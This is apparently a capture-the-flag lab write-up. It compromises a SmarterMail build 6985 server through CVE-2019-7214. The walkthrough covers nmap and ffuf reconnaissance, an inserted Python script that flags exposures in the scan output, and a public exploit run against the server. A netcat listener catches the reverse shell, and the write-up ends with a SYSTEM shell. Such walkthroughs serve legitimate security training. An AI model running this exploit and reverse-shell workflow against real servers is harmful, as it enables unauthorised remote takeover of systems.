Machine Info

This lab demonstrates exploiting a remote code execution vulnerability in SmarterMail build 6985 to gain SYSTEM-level access on a Windows server. Learners will identify the application version, leverage an RCE exploit, and use a reverse shell payload to compromise the target. This lab emphasizes web application exploitation and highlights the risks of unpatched software.

Administrator

Reconnaissance

We are going to start by running our nmap scan:

└─$ ports=$(nmap -p- --min-rate=1000 -T4 $VICTIM | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

└─$ nmap -p$ports -sC -sV $VICTIM
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20  09:31PM       <DIR>          ImapRetrieval
| 03-03-26  08:10AM       <DIR>          Logs
| 04-29-20  09:31PM       <DIR>          PopRetrieval
|_04-29-20  09:32PM       <DIR>          Spool
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
9998/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Tue, 03 Mar 2026 16:13:54 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
|_http-server-header: Microsoft-IIS/10.0
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
17001/tcp open  remoting      MS .NET Remoting services
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|2019|7|2008|8.1 (98%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows 10 1909 - 2004 (98%), Microsoft Windows 10 1909 (93%), Microsoft Windows 10 1709 - 21H2 (92%), Microsoft Windows 10 20H2 - 21H1 (90%), Microsoft Windows 10 21H2 (90%), Microsoft Windows Server 2019 (90%), Microsoft Windows 10 20H2 (90%), Microsoft Windows 10 1903 - 21H1 (89%), Microsoft Windows 10 1803 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 or Windows 8.1 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 11s
| smb2-time: 
|   date: 2026-03-03T16:13:55
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Of the services listed, ports 9998, 7680 and 17001 seem uncommon. Looking at the web application on port 9998 we come across SmarterMail.
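As an added defender-side example that is not part of the original writeup, the following Python triages an nmap -sC -sV report like the one above: it groups NSE script lines under the port they belong to and flags the exposures this particular scan surfaced (anonymous FTP, the TRACE method, a .NET Remoting endpoint reachable over the network, SMB signing not enforced). The scan excerpt is constructed from the output above, and parse_nmap, flag_exposures and CHECKS are hypothetical names.

```python
import re

# Constructed excerpt of the nmap -sC -sV report above (in practice read an nmap -oN file).
SAMPLE_SCAN = """\
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
17001/tcp open  remoting      MS .NET Remoting services

Host script results:
| smb2-security-mode:
|_    Message signing enabled but not required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    # One entry per port line plus a port=None entry for "Host script results";
    # NSE script lines attach to the entry they follow, with '|' / '|_' stripped.
    entries, cur = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            cur = {"port": int(m.group(1)), "service": m.group(4),
                   "version": m.group(5).strip(), "scripts": []}
            entries.append(cur)
        elif line.startswith("Host script results"):
            cur = {"port": None, "service": "host", "version": "", "scripts": []}
            entries.append(cur)
        elif line.startswith("|") and cur is not None:
            cur["scripts"].append(line.lstrip("|_ ").strip())
    return entries

# Lower-cased substrings of service/version/script text that mark a weakness to fix.
CHECKS = [
    ("anonymous ftp login allowed", "anonymous FTP login enabled"),
    ("potentially risky methods: trace", "HTTP TRACE method enabled"),
    (".net remoting", ".NET Remoting endpoint reachable from the network"),
    ("signing enabled but not required", "SMB signing not required"),
]

def flag_exposures(entries):
    # Returns (port, finding) pairs; port None marks a host-level finding.
    findings = []
    for e in entries:
        blob = " ".join([e["service"], e["version"], *e["scripts"]]).lower()
        findings += [(e["port"], msg) for needle, msg in CHECKS if needle in blob]
    return findings
```

Running flag_exposures(parse_nmap(SAMPLE_SCAN)) yields one finding per affected port plus the host-level SMB signing finding, which is the list a hardening ticket for this server would start from.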

Web - SmarterMail

└─$ ffuf -u http://$VICTIM:9998/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://$VICTIM:9998/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

Download                [Status: 500, Size: 36, Words: 4, Lines: 1, Duration: 321ms]
Scripts                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 87ms]
Services                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 84ms]
api                     [Status: 200, Size: 5199, Words: 261, Lines: 78, Duration: 90ms]
aux                     [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 95ms]
com1                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 82ms]
com2                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 85ms]
com4                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 86ms]
com3                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 87ms]
con                     [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 91ms]
download                [Status: 500, Size: 36, Words: 4, Lines: 1, Duration: 88ms]
favicon.ico             [Status: 200, Size: 32038, Words: 13, Lines: 13, Duration: 33ms]
fonts                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 95ms]
interface               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 84ms]
lpt1                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 85ms]
lpt2                    [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 86ms]
nul                     [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 96ms]
prn                     [Status: 200, Size: 4845, Words: 140, Lines: 82, Duration: 95ms]
reports                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 331ms]
scripts                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 78ms]
services                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 90ms]
views                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 99ms]

The fuzzing does not reveal much. Looking SmarterMail up online we find possible exploits, but we are not yet sure of the version; the details for port 17001 (.NET Remoting), however, point us to CVE-2019-7214.

Tip
We are going to use the above exploit, but first we need to set the correct IP addresses for the remote host and the local host so that we receive the reverse shell.

Using the exploit we are able to achieve RCE and get access to SYSTEM.

└─$ python 49216.py
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [$ATTACKER] from (UNKNOWN) [$VICTIM] 49759

PS C:\Windows\system32> cd C:\
PS C:\> ls

    Directory: C:\

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        4/29/2020  10:37 PM                inetpub                                                               
d-----        4/24/2020   3:42 AM                PerfLogs                                                              
d-r---         5/2/2022   7:34 AM                Program Files                                                         
d-r---         5/2/2022   7:33 AM                Program Files (x86)                                                   
d-----        4/29/2020  10:31 PM                SmarterMail                                                           
d-r---         3/3/2026   8:11 AM                Users                                                                 
d-----         5/2/2022   7:49 AM                Windows                                                               
-a----         3/3/2026   8:10 AM           2663 output.txt                                                            

PS C:\> whoami
nt authority\system